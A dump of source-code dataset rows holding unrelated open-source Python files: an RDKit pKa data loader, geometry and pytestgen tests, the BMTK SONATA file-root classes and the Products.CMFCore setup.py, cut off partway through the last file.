40b5da6d9b057ada5f1d37ec3aedaa657578ee0d | 3,906 | py | Python | mol_property/pka/data_utils.py | Mana-bio/mol_property | 16c83bf9c6c03e25695cc913c68ec23ff704f2bc | [
"MIT"
] | 8 | 2019-08-24T22:19:53.000Z | 2022-03-20T06:21:55.000Z | mol_property/pka/data_utils.py | Mana-bio/mol_property | 16c83bf9c6c03e25695cc913c68ec23ff704f2bc | [
"MIT"
] | 1 | 2021-09-08T20:43:06.000Z | 2021-09-26T22:38:51.000Z | mol_property/pka/data_utils.py | Mana-bio/mol_property | 16c83bf9c6c03e25695cc913c68ec23ff704f2bc | [
"MIT"
] | 5 | 2019-08-24T22:24:02.000Z | 2022-03-20T06:22:06.000Z | # -*- coding: utf-8 -*-
import os
import numpy as np
import pandas as pd
import rdkit
from rdkit import Chem, DataStructs
from rdkit.Chem import AllChem, Descriptors
DATA_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), "./train/data/pKaInWater.csv")
| 40.268041 | 117 | 0.592678 | # -*- coding: utf-8 -*-
import os
import numpy as np
import pandas as pd
import rdkit
from rdkit import Chem, DataStructs
from rdkit.Chem import AllChem, Descriptors
DATA_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), "./train/data/pKaInWater.csv")
def rdkit_numpy_convert(fp):
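    """Convert a list of RDKit fingerprint objects into a 2-D numpy array."""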
output = []
for f in fp:
arr = np.zeros((1,))
DataStructs.ConvertToNumpyArray(f, arr)
output.append(arr)
return np.asarray(output)
class DataUtils(object):
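    """Loads the pKa-in-water dataset and builds fingerprint features for it."""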
def __init__(self, filepath=DATA_PATH):
self.filepath = filepath
self.df_pka = pd.read_csv(self.filepath)
self.df_pka_acidic = self.df_pka[self.df_pka["basicOrAcidic"] == "acidic"]
self.df_pka_basic = self.df_pka[self.df_pka["basicOrAcidic"] == "basic"]
def describe(self):
print("Unique: {} / {}".format(len(self.df_pka["Smiles"].unique()),
self.df_pka.shape[0]))
print("basic Unique: {} / {}".format(len(self.df_pka_basic["Smiles"].unique()),
self.df_pka_basic.shape[0]))
acidic_only_cnt = len(set(self.df_pka_acidic["Smiles"].unique()) - set(self.df_pka_basic["Smiles"].unique()))
basic_only_cnt = len(set(self.df_pka_basic["Smiles"].unique()) - set(self.df_pka_acidic["Smiles"].unique()))
both_pka_cnt = len(set(self.df_pka_basic["Smiles"].unique()) & set(self.df_pka_acidic["Smiles"].unique()))
print("acidic_only_cnt: {}, basic_only_cnt: {}, both_pka_cnt: {}".format(acidic_only_cnt, basic_only_cnt,
both_pka_cnt))
def get_regression_data(self, data_category="all", feature_type="morgan"):
'''
:param data_category: all | acidic_only | basic_only
        :param feature_type: morgan | macc | morgan+macc
        :return: (feature matrix, list of pKa targets) for the selected subset
'''
df_tmp = self.df_pka
if data_category == "basic_only":
df_tmp = self.df_pka_basic
elif data_category == "acidic_only":
df_tmp = self.df_pka_acidic
mols = []
targets = []
for row in df_tmp[["pKa", "Smiles"]].iterrows():
pka, smi = row[1]
mol = Chem.MolFromSmiles(smi)
if mol is None:
print(smi)
else:
mols.append(mol)
targets.append(pka)
return self.get_molecular_features(mols, feature_type), targets
def get_classification_data(self, feature_type="morgan+macc"):
'''
        :param feature_type: morgan | macc | morgan+macc
        :return: (feature matrix, acidic labels, basic labels)
'''
smi_dict = {}
for row in self.df_pka[["basicOrAcidic", "Smiles"]].iterrows():
basicOrAcidic, smi = row[1]
if Chem.MolFromSmiles(smi) is not None:
if smi not in smi_dict:
smi_dict[smi] = {"basic": 0, "acidic": 0}
smi_dict[smi][basicOrAcidic] = 1
df_smi = pd.DataFrame(smi_dict).transpose()
return self.get_molecular_features([Chem.MolFromSmiles(mol) for mol in df_smi.index], feature_type), \
df_smi["acidic"].values, df_smi["basic"].values
@staticmethod
def get_molecular_features(mols, feature_type="morgan+macc"):
'''
        :param mols: RDKit molecule objects
        :param feature_type: morgan | macc | morgan+macc
        :return: numpy feature matrix for the given molecules
'''
fp_morgan = [AllChem.GetMorganFingerprintAsBitVect(mol, 2, nBits=1024) for mol in mols]
fp_macc = [AllChem.GetMACCSKeysFingerprint(mol) for mol in mols]
if feature_type == "morgan":
return rdkit_numpy_convert(fp_morgan)
elif feature_type == "macc":
return rdkit_numpy_convert(fp_macc)
elif feature_type == "morgan+macc":
return np.concatenate([rdkit_numpy_convert(fp_morgan), rdkit_numpy_convert(fp_macc)], axis=1)
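# Example usage (sketch only; assumes the default pKaInWater.csv is present):
#   du = DataUtils()
#   X, y = du.get_regression_data(data_category="acidic_only", feature_type="morgan")
#   X_cls, y_acidic, y_basic = du.get_classification_data()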
| 1,297 | 2,293 | 46 |
a4683567b2e99fc407027a44e5ea64574ddf5871 | 940 | py | Python | tests/base_tests/multipolygon_tests/test_contains.py | lycantropos/gon | b3f811ece5989d1623b17d633a84071fbff6dd69 | [
"MIT"
] | 10 | 2020-07-18T12:55:52.000Z | 2022-03-20T07:09:10.000Z | tests/base_tests/multipolygon_tests/test_contains.py | lycantropos/gon | b3f811ece5989d1623b17d633a84071fbff6dd69 | [
"MIT"
] | 52 | 2019-07-11T16:59:01.000Z | 2022-03-29T19:41:59.000Z | tests/base_tests/multipolygon_tests/test_contains.py | lycantropos/gon | b3f811ece5989d1623b17d633a84071fbff6dd69 | [
"MIT"
] | 1 | 2020-03-22T12:56:07.000Z | 2020-03-22T12:56:07.000Z | from typing import Tuple
from hypothesis import given
from gon.base import (Multipolygon,
Point)
from tests.utils import equivalence
from . import strategies
@given(strategies.multipolygons)
@given(strategies.multipolygons_with_points)
| 28.484848 | 79 | 0.719149 | from typing import Tuple
from hypothesis import given
from gon.base import (Multipolygon,
Point)
from tests.utils import equivalence
from . import strategies
@given(strategies.multipolygons)
def test_vertices(multipolygon: Multipolygon) -> None:
assert all(vertex in multipolygon
for polygon in multipolygon.polygons
for vertex in polygon.border.vertices)
assert all(vertex in multipolygon
for polygon in multipolygon.polygons
for hole in polygon.holes
for vertex in hole.vertices)
@given(strategies.multipolygons_with_points)
def test_indexing(multipolygon_with_point: Tuple[Multipolygon, Point]) -> None:
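    # Building the spatial index must not change point-in-multipolygon results.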
multipolygon, point = multipolygon_with_point
before_indexing = point in multipolygon
multipolygon.index()
after_indexing = point in multipolygon
assert equivalence(before_indexing, after_indexing)
| 632 | 0 | 44 |
0d7a3e5a79ba80bc82f905112ac0ea79d2da3cf1 | 531 | py | Python | src/options.py | StrinTH/DrHelp | 76cdcd549f6c8ad6315e5c4557793c622a833c6a | [
"MIT"
] | 1 | 2021-12-02T15:04:08.000Z | 2021-12-02T15:04:08.000Z | src/options.py | StrinTH/DrHelp | 76cdcd549f6c8ad6315e5c4557793c622a833c6a | [
"MIT"
] | null | null | null | src/options.py | StrinTH/DrHelp | 76cdcd549f6c8ad6315e5c4557793c622a833c6a | [
"MIT"
] | 1 | 2021-12-02T15:04:09.000Z | 2021-12-02T15:04:09.000Z | from default_data import default_data
values={1:str(default_data.sample_id),2:default_data.sample_type,3:default_data.report_type,4:default_data.doc_type }
set_options = {1:"id", 2:"type", 3:"report", 4:"doc"}
get_options = {1: "name", 2: "intro", 3: "gene", 4: "stem-loop", 5: "peptide", 6: "cds", 7: "source", 8: "comment", 9: "all"}
cases = {0:"exit",1:"cls",2:"get",3:"help",4:"set",5:"visualize",6: "ftp",7: "options", 8: "fetch", 9: "searchd", 10: "searchl"}
error_key = {0: "Your browsing activity is empty.", 1: "Error404"} | 88.5 | 128 | 0.65725 | from default_data import default_data
values={1:str(default_data.sample_id),2:default_data.sample_type,3:default_data.report_type,4:default_data.doc_type }
set_options = {1:"id", 2:"type", 3:"report", 4:"doc"}
get_options = {1: "name", 2: "intro", 3: "gene", 4: "stem-loop", 5: "peptide", 6: "cds", 7: "source", 8: "comment", 9: "all"}
cases = {0:"exit",1:"cls",2:"get",3:"help",4:"set",5:"visualize",6: "ftp",7: "options", 8: "fetch", 9: "searchd", 10: "searchl"}
error_key = {0: "Your browsing activity is empty.", 1: "Error404"} | 0 | 0 | 0 |
1bcfd676504406ba19e350f8d7e47ab9e71aaa8d | 4,179 | py | Python | tests/pytestgen/test_output.py | notionparallax/pytestgen | 52821ac1ed3aa4864fa47af9dd1825f92d4367d7 | [
"MIT"
] | 5 | 2019-10-20T19:58:50.000Z | 2021-12-15T00:44:41.000Z | tests/pytestgen/test_output.py | notionparallax/pytestgen | 52821ac1ed3aa4864fa47af9dd1825f92d4367d7 | [
"MIT"
] | 2 | 2020-02-02T12:23:37.000Z | 2021-12-13T23:58:42.000Z | tests/pytestgen/test_output.py | notionparallax/pytestgen | 52821ac1ed3aa4864fa47af9dd1825f92d4367d7 | [
"MIT"
] | 2 | 2020-05-18T13:56:30.000Z | 2021-12-15T00:44:46.000Z | from ast import FunctionDef
from os import path
from munch import munchify
from pyfakefs.pytest_plugin import fs
import pytest
from pytestgen.load import PyTestGenInputFile
from pytestgen.parse import PyTestGenParsedSet, PyTestGenParsedFile, get_existing_test_functions
import pytestgen.output
from fixtures import mock_module_testable_func, mock_class_testable_func
@pytest.fixture
@pytest.fixture
| 40.572816 | 96 | 0.767408 | from ast import FunctionDef
from os import path
from munch import munchify
from pyfakefs.pytest_plugin import fs
import pytest
from pytestgen.load import PyTestGenInputFile
from pytestgen.parse import PyTestGenParsedSet, PyTestGenParsedFile, get_existing_test_functions
import pytestgen.output
from fixtures import mock_module_testable_func, mock_class_testable_func
@pytest.fixture
def mock_parsed_file(mock_module_testable_func, mock_class_testable_func):
return PyTestGenParsedFile(
[mock_module_testable_func(),
mock_class_testable_func()], PyTestGenInputFile("a_file.py", "a_dir"))
@pytest.fixture
def mock_parsed_set(mock_parsed_file):
fake_input_set = munchify({"output_dir": "output"})
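    # munchify turns the dict into an attribute-accessible stub, standing in
    # for the real input-set object, of which only `.output_dir` is used here.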
return PyTestGenParsedSet([mock_parsed_file], fake_input_set)
def test_output_tests(fs, mock_parsed_set, monkeypatch):
pytestgen.output.output_tests(mock_parsed_set)
test_file_path = path.join("output", "a_dir", "test_a_file.py")
    assert path.exists(test_file_path), "test file did not exist"
# we need to patch FunctionDef back in, it was patched out in the
# 'mock_class_testable_func' fixture used in 'mock_parsed_set'
# otherwise isinstance() for FunctionDef will fail in
# get_existing_test_functions()
monkeypatch.setattr(pytestgen.parse.ast, "FunctionDef", FunctionDef)
outputted_funcs = get_existing_test_functions(test_file_path)
assert outputted_funcs == [
"test_a_test_function", "test_testclass_a_class_test_function"
]
def test_output_tests_include(fs, mock_parsed_set, monkeypatch):
pytestgen.output.output_tests(mock_parsed_set, include=["a_test_function"])
test_file_path = path.join("output", "a_dir", "test_a_file.py")
    assert path.exists(test_file_path), "test file did not exist"
# we need to patch FunctionDef back in, it was patched out in the
# 'mock_class_testable_func' fixture used in 'mock_parsed_set'
# otherwise isinstance() for FunctionDef will fail in
# get_existing_test_functions()
monkeypatch.setattr(pytestgen.parse.ast, "FunctionDef", FunctionDef)
outputted_funcs = get_existing_test_functions(test_file_path)
assert outputted_funcs == ["test_a_test_function"]
def test_output_parsed_file_nonexist(fs, mock_parsed_file, monkeypatch):
test_file_path = path.join("output", "a_dir", "test_a_file.py")
pytestgen.output._output_parsed_file(mock_parsed_file, "output")
    assert path.exists(test_file_path), "test file did not exist"
# we need to patch FunctionDef back in, it was patched out in the
# 'mock_class_testable_func' fixture used in 'mock_parsed_set'
# otherwise isinstance() for FunctionDef will fail in
# get_existing_test_functions()
monkeypatch.setattr(pytestgen.parse.ast, "FunctionDef", FunctionDef)
outputted_funcs = get_existing_test_functions(test_file_path)
assert outputted_funcs == [
"test_a_test_function", "test_testclass_a_class_test_function"
]
def test_output_parsed_file_exists(fs, mock_parsed_file, monkeypatch):
test_file_path = path.join("output", "a_dir", "test_a_file.py")
fs.create_file(mock_parsed_file.input_file.get_test_file_path("output"))
pytestgen.output._output_parsed_file(mock_parsed_file, "output")
    assert path.exists(test_file_path), "test file did not exist"
# we need to patch FunctionDef back in, it was patched out in the
# 'mock_class_testable_func' fixture used in 'mock_parsed_set'
# otherwise isinstance() for FunctionDef will fail in
# get_existing_test_functions()
monkeypatch.setattr(pytestgen.parse.ast, "FunctionDef", FunctionDef)
outputted_funcs = get_existing_test_functions(test_file_path)
assert outputted_funcs == [
"test_a_test_function", "test_testclass_a_class_test_function"
]
def test_ensure_dir_non_exist(fs):
pytestgen.output._ensure_dir(path.join("test_dir", "test_name.py"))
assert path.exists("test_dir") == True
def test_ensure_dir_exist(fs):
fs.create_dir("test_dir")
pytestgen.output._ensure_dir(path.join("test_dir", "test_name.py"))
assert path.exists("test_dir") == True | 3,586 | 0 | 182 |
071e88c7c8b0ef8617a798c4d21554568522c26c | 13,856 | py | Python | bmtk/utils/sonata/file_root.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | [
"BSD-3-Clause"
] | 216 | 2017-10-03T17:02:42.000Z | 2022-03-20T03:35:48.000Z | bmtk/utils/sonata/file_root.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | [
"BSD-3-Clause"
] | 92 | 2018-03-19T10:14:18.000Z | 2022-01-29T15:21:47.000Z | bmtk/utils/sonata/file_root.py | tjbanks/bmtk | 52fee3b230ceb14a666c46f57f2031c38f1ac5b1 | [
"BSD-3-Clause"
] | 97 | 2017-10-03T22:15:06.000Z | 2022-03-23T21:03:26.000Z | # Copyright 2017. Allen Institute. All rights reserved
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os
import sys
import h5py
import pandas as pd
import numpy as np
from . import utils
from .population import NodePopulation, EdgePopulation
from .types_table import NodeTypesTable, EdgeTypesTable
class FileRoot(object):
"""Base class for both /nodes and /edges root group in h5 file"""
def __init__(self, root_name, h5_files, h5_mode, csv_files):
"""
:param root_name: should either be 'nodes' or 'edges'
:param h5_files: file (or list of files) containing nodes/edges
:param h5_mode: currently only supporting 'r' mode in h5py
:param csv_files: file (or list of files) containing node/edge types
"""
self._root_name = root_name
self._h5_handles = [utils.load_h5(f, h5_mode) for f in utils.listify(h5_files)]
self._csv_handles = [(f, utils.load_csv(f)) for f in utils.listify(csv_files)]
# merge and create a table of the types table(s)
self._types_table = None
self._build_types_table()
# population_name->h5py.Group table (won't instantiate the population)
self._populations_groups = {}
self._store_groups()
        # A map between population_name -> Population object. Population objects aren't created until requested, in
        # case the user wants to split populations among MPI nodes (instantiation builds node/edge indices and other
        # overhead).
self._populations_cache = {}
self.check_format()
@property
@property
@property
@property
@types_table.setter
def _store_groups(self):
"""Create a map between group population to their h5py.Group handle"""
for h5handle in self._h5_handles:
assert(self.root_name in h5handle.keys())
for pop_name, pop_group in h5handle[self._root_name].items():
if pop_name in self._populations_groups:
raise Exception('Multiple {} populations with name {}.'.format(self._root_name, pop_name))
self._populations_groups[pop_name] = pop_group
def get_population(self, population_name, default=None):
"""Return a population group object based on population's name"""
if population_name in self:
return self[population_name]
else:
# need this for EdgeRoot.get_populations
return default
| 45.880795 | 120 | 0.670612 | # Copyright 2017. Allen Institute. All rights reserved
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os
import sys
import h5py
import pandas as pd
import numpy as np
from . import utils
from .population import NodePopulation, EdgePopulation
from .types_table import NodeTypesTable, EdgeTypesTable
class FileRoot(object):
"""Base class for both /nodes and /edges root group in h5 file"""
def __init__(self, root_name, h5_files, h5_mode, csv_files):
"""
:param root_name: should either be 'nodes' or 'edges'
:param h5_files: file (or list of files) containing nodes/edges
:param h5_mode: currently only supporting 'r' mode in h5py
:param csv_files: file (or list of files) containing node/edge types
"""
self._root_name = root_name
self._h5_handles = [utils.load_h5(f, h5_mode) for f in utils.listify(h5_files)]
self._csv_handles = [(f, utils.load_csv(f)) for f in utils.listify(csv_files)]
# merge and create a table of the types table(s)
self._types_table = None
self._build_types_table()
# population_name->h5py.Group table (won't instantiate the population)
self._populations_groups = {}
self._store_groups()
        # A map between population_name -> Population object. Population objects aren't created until requested, in
        # case the user wants to split populations among MPI nodes (instantiation builds node/edge indices and other
        # overhead).
self._populations_cache = {}
self.check_format()
@property
def root_name(self):
return self._root_name
@property
def population_names(self):
return list(self._populations_groups.keys())
@property
def populations(self):
return [self[name] for name in self.population_names]
@property
def types_table(self):
return self._types_table
@types_table.setter
def types_table(self, types_table):
self._types_table = types_table
def _build_types_table(self):
raise NotImplementedError
def _store_groups(self):
"""Create a map between group population to their h5py.Group handle"""
for h5handle in self._h5_handles:
assert(self.root_name in h5handle.keys())
for pop_name, pop_group in h5handle[self._root_name].items():
if pop_name in self._populations_groups:
raise Exception('Multiple {} populations with name {}.'.format(self._root_name, pop_name))
self._populations_groups[pop_name] = pop_group
def _build_population(self, pop_name, pop_group):
raise NotImplementedError
def get_population(self, population_name, default=None):
"""Return a population group object based on population's name"""
if population_name in self:
return self[population_name]
else:
# need this for EdgeRoot.get_populations
return default
def check_format(self):
if len(self._h5_handles) == 0:
raise Exception('No {} hdf5 files specified.'.format(self.root_name))
if len(self._csv_handles) == 0:
raise Exception('No {} types csv files specified.'.format(self.root_name))
def __contains__(self, population_name):
# TODO: Add condition if user passes in io.Population object
return population_name in self.population_names
def __getitem__(self, population_name):
if population_name not in self:
raise Exception('{} does not contain a population with name {}.'.format(self.root_name, population_name))
if population_name in self._populations_cache:
return self._populations_cache[population_name]
else:
h5_grp = self._populations_groups[population_name]
pop_obj = self._build_population(population_name, h5_grp)
self._populations_cache[population_name] = pop_obj
return pop_obj
class NodesRoot(FileRoot):
def __init__(self, nodes, node_types, mode='r', gid_table=None):
super(NodesRoot, self).__init__('nodes', h5_files=nodes, h5_mode=mode, csv_files=node_types)
# load the gid <--> (node_id, population) map if specified.
self._gid_table = gid_table
self._gid_table_groupby = {}
self._has_gids = False
        # TODO: Should we allow gid-table to be built into '/nodes' h5 groups, or must it always be a separate file?
if gid_table is not None:
self.set_gid_table(gid_table)
@property
def has_gids(self):
return self._has_gids
@property
def node_types_table(self):
return self.types_table
def set_gid_table(self, gid_table, force=False):
"""Adds a map from a gids <--> (node_id, population) based on specification.
:param gid_table: An h5 file/group containing map specifications
        :param force: Set to true to have it overwrite any existing gid table (default False)
"""
assert(gid_table is not None)
if self.has_gids and not force:
raise Exception('gid table already exists (use force=True to overwrite)')
self._gid_table = utils.load_h5(gid_table, 'r')
        # TODO: validate that the correct columns/dtypes exist.
gid_df = pd.DataFrame()
gid_df['gid'] = pd.Series(data=self._gid_table['gid'], dtype=self._gid_table['gid'].dtype)
gid_df['node_id'] = pd.Series(data=self._gid_table['node_id'], dtype=self._gid_table['node_id'].dtype)
gid_df['population'] = pd.Series(data=self._gid_table['population'])
population_names_ds = self._gid_table['population_names']
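        # The 'population' column stores integer ids; each group's id is
        # resolved to a name via the population_names lookup dataset.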
for pop_id, subset in gid_df.groupby(by='population'):
pop_name = population_names_ds[pop_id]
self._gid_table_groupby[pop_name] = subset
self._has_gids = True
def generate_gids(self, file_name, gids=None, force=False):
"""Creates a gid <--> (node_id, population) table based on sonnet specifications.
        Generating gids can take some time, so it is not recommended to call this during a simulation. Instead, save
        the file to disk and pass the h5 file in during the simulation (using the gid_table parameter). In fact, if
        you're worried about efficiency, don't use this method at all.
:param file_name: Name of h5 file to save gid map to.
:param gids: rule/list of gids to use
:param force: set to true to overwrite existing gid map (default False).
"""
        # TODO: This is very inefficient, fix (although not a priority as this function should be called sparingly)
# TODO: Allow users to pass in a list/function to determine gids
# TODO: We should use an enumerated lookup table for population ds instead of storing strings
# TODO: Move this to a utils function rather than a File
if self.has_gids and not force:
raise Exception('Nodes already have a gid table. Use force=True to overwrite existing gids.')
dir_name = os.path.dirname(os.path.abspath(file_name))
if not os.path.exists(dir_name):
os.makedirs(dir_name)
with h5py.File(file_name, 'w') as h5:
# TODO: should we use mode 'x', or give an option to overwrite existing files
n_nodes = 0
ascii_len = 0 # store max population name for h5 fixed length strings
# Find population names and the total size of every population
for node_pop in self.populations:
n_nodes += len(node_pop)
name_nchars = len(node_pop.name)
ascii_len = ascii_len if ascii_len >= name_nchars else name_nchars
# node_id and gid datasets should just be unsigned integers
h5.create_dataset(name='gid', shape=(n_nodes,), dtype=np.uint64)
h5.create_dataset(name='node_id', shape=(n_nodes,), dtype=np.uint64)
# TODO: determine population precisions from num of populations
h5.create_dataset(name='population', shape=(n_nodes,), dtype=np.uint16)
# Create a lookup table for pop-name
pop_name_list = [pname for pname in self.population_names]
if utils.using_py3:
dt = h5py.special_dtype(vlen=str) # python 3
else:
dt = h5py.special_dtype(vlen=unicode) # python 2
h5.create_dataset(name='population_names', shape=(len(pop_name_list),), dtype=dt)
            # No clue why, but just passing the data in during create_dataset doesn't work in h5py
for i, n in enumerate(pop_name_list):
h5['population_names'][i] = n
# write each (gid, node_id, population)
indx = 0
for node_pop in self.populations:
# TODO: Block write if special gid generator isn't being used
# TODO: Block write populations at least
pop_name = node_pop.name # encode('ascii', 'ignore')
pop_id = pop_name_list.index(pop_name)
for node in node_pop:
h5['node_id'][indx] = node.node_id
h5['population'][indx] = pop_id
h5['gid'][indx] = indx
indx += 1
# pass gid table to current nodes
self.set_gid_table(h5)
def _build_types_table(self):
self.types_table = NodeTypesTable()
for _, csvhandle in self._csv_handles:
self.types_table.add_table(csvhandle)
def _build_population(self, pop_name, pop_group):
return NodePopulation(pop_name, pop_group, self.node_types_table)
def __getitem__(self, population_name):
        # If there is a gid map then we must pass it into the population
pop_obj = super(NodesRoot, self).__getitem__(population_name)
if self.has_gids and (not pop_obj.has_gids) and (population_name in self._gid_table_groupby):
pop_obj.add_gids(self._gid_table_groupby[population_name])
return pop_obj
class EdgesRoot(FileRoot):
def __init__(self, edges, edge_types, mode='r'):
super(EdgesRoot, self).__init__(root_name='edges', h5_files=edges, h5_mode=mode, csv_files=edge_types)
@property
def edge_types_table(self):
return self.types_table
def get_populations(self, name=None, source=None, target=None):
"""Find all populations with matching criteria, either using the population name (which will return a list
of size 0 or 1) or based on the source/target population.
        To return a list of all populations just use the `populations` property
:param name: (str) name of population
:param source: (str or NodePopulation) returns edges with nodes coming from matching source-population
:param target: (str or NodePopulation) returns edges with nodes coming from matching target-population
:return: A (potential empty) list of EdgePopulation objects filter by criteria.
"""
assert((name is not None) ^ (source is not None or target is not None))
if name is not None:
return [self[name]]
else:
# TODO: make sure groups aren't built unless they are a part of the results
selected_pops = self.population_names
if source is not None:
# filter out only edges with given source population
source = source.name if isinstance(source, NodePopulation) else source
selected_pops = [name for name in selected_pops
if EdgePopulation.get_source_population(self._populations_groups[name]) == source]
if target is not None:
# filter out by target population
target = target.name if isinstance(target, NodePopulation) else target
selected_pops = [name for name in selected_pops
if EdgePopulation.get_target_population(self._populations_groups[name]) == target]
return [self[name] for name in selected_pops]
def _build_types_table(self):
self.types_table = EdgeTypesTable()
for _, csvhandle in self._csv_handles:
self.edge_types_table.add_table(csvhandle)
def _build_population(self, pop_name, pop_group):
return EdgePopulation(pop_name, pop_group, self.edge_types_table)
| 2,885 | 6,760 | 311 |
27a41e0d544a5c6660bd427e332b412facc45223 | 2,615 | py | Python | setup.py | wlang42/Products.CMFCore | 9e4872425c46b50b730750b230cfe7221bc2a7d4 | ["ZPL-2.1"] | null | null | null | setup.py | wlang42/Products.CMFCore | 9e4872425c46b50b730750b230cfe7221bc2a7d4 | ["ZPL-2.1"] | null | null | null | setup.py | wlang42/Products.CMFCore | 9e4872425c46b50b730750b230cfe7221bc2a7d4 | ["ZPL-2.1"] | null | null | null |
import os
from setuptools import setup
from setuptools import find_packages
NAME = 'CMFCore'
here = os.path.abspath(os.path.dirname(__file__))
package = os.path.join(here, 'Products', NAME)
_boundary = '\n' + ('-' * 60) + '\n\n'
README = _boundary.join([
_package_doc('README.txt'),
_package_doc('CHANGES.txt'),
])
setup(name='Products.%s' % NAME,
version='2.4.0b5.dev0',
description='Zope Content Management Framework core components',
long_description=README,
classifiers=[
"Development Status :: 4 - Beta",
"Framework :: Plone",
"Framework :: Zope :: 4",
"Intended Audience :: Developers",
"License :: OSI Approved :: Zope Public License",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Software Development :: Libraries :: Application Frameworks", # noqa
],
keywords='web application server zope cmf',
author="Zope Foundation and Contributors",
author_email="zope-cmf@zope.org",
url="https://github.com/zopefoundation/Products.CMFCore",
license="ZPL 2.1",
packages=find_packages(),
include_package_data=True,
namespace_packages=['Products'],
zip_safe=False,
setup_requires=[
'eggtestinfo',
],
install_requires=[
'setuptools',
'Zope >= 4.0b4',
'docutils',
'five.localsitemanager',
'Products.BTreeFolder2',
'Products.GenericSetup >= 2.0b1',
'Products.MailHost >= 4.0',
'Products.PythonScripts',
'Products.StandardCacheManagers',
'Products.ZCTextIndex',
'six',
],
tests_require=[
'zope.testing >= 3.7.0',
'Products.StandardCacheManagers',
],
extras_require={
'test': ['Products.StandardCacheManagers'],
'zsql': ['Products.ZSQLMethods >= 3.0.0b1'],
},
test_loader='zope.testing.testrunner.eggsupport:SkipLayers',
test_suite='Products.%s' % NAME,
entry_points="""
[zope2.initialize]
Products.%s = Products.%s:initialize
[distutils.commands]
ftest = zope.testing.testrunner.eggsupport:ftest
""" % (NAME, NAME),
)
| 31.890244 | 89 | 0.587763 | import os
from setuptools import setup
from setuptools import find_packages
NAME = 'CMFCore'
here = os.path.abspath(os.path.dirname(__file__))
package = os.path.join(here, 'Products', NAME)
def _package_doc(name):
f = open(os.path.join(here, name))
return f.read()
_boundary = '\n' + ('-' * 60) + '\n\n'
README = _boundary.join([
_package_doc('README.txt'),
_package_doc('CHANGES.txt'),
])
setup(name='Products.%s' % NAME,
version='2.4.0b5.dev0',
description='Zope Content Management Framework core components',
long_description=README,
classifiers=[
"Development Status :: 4 - Beta",
"Framework :: Plone",
"Framework :: Zope :: 4",
"Intended Audience :: Developers",
"License :: OSI Approved :: Zope Public License",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: Implementation :: CPython",
"Topic :: Software Development :: Libraries :: Application Frameworks", # noqa
],
keywords='web application server zope cmf',
author="Zope Foundation and Contributors",
author_email="zope-cmf@zope.org",
url="https://github.com/zopefoundation/Products.CMFCore",
license="ZPL 2.1",
packages=find_packages(),
include_package_data=True,
namespace_packages=['Products'],
zip_safe=False,
setup_requires=[
'eggtestinfo',
],
install_requires=[
'setuptools',
'Zope >= 4.0b4',
'docutils',
'five.localsitemanager',
'Products.BTreeFolder2',
'Products.GenericSetup >= 2.0b1',
'Products.MailHost >= 4.0',
'Products.PythonScripts',
'Products.StandardCacheManagers',
'Products.ZCTextIndex',
'six',
],
tests_require=[
'zope.testing >= 3.7.0',
'Products.StandardCacheManagers',
],
extras_require={
'test': ['Products.StandardCacheManagers'],
